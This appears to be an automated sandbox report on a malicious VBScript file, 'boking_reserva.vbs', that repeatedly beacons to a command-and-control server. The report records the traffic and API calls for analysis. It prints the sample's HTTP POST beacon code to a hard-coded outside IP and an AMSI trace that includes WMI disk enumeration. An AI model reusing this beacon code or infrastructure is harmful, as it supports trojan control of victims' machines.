Source: Submited Sample |
Integrated Neural Analysis Model: Matched 98.1% probability |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 185.244.29.74 456 |
Jump to behavior |
Source: |
Initial file: xx.open "POST", "http://185.244.29.74:456/document", False:xx.setrequestheader "User-Agent", gg:xx.send |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49721 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49725 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49726 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 456 |
Source: global traffic |
TCP traffic: 192.168.2.7:49699 -> 185.244.29.74:456 |
Source: boking_reserva.vbs |
Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4 |
Source: boking_reserva.vbs |
Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4 |
Source: Joe Sandbox View |
ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache |
Source: wscript.exe, 00000000.00000002.3722607572.0000020DA68B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238956045.0000020DA85E4000.00000004.00000020.00020000.00000000.sdmp, boking_reserva.vbs |
String found in binary or memory: http://185.244.29.74:456/document |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document& |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document0 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document609 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentEncoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documenta |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentcept-Encoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentd |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentf |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documenti |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentj |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentn |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: boking_reserva.vbs |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal84.troj.evad.winVBS@1/0@0/1 |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs" |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.ope |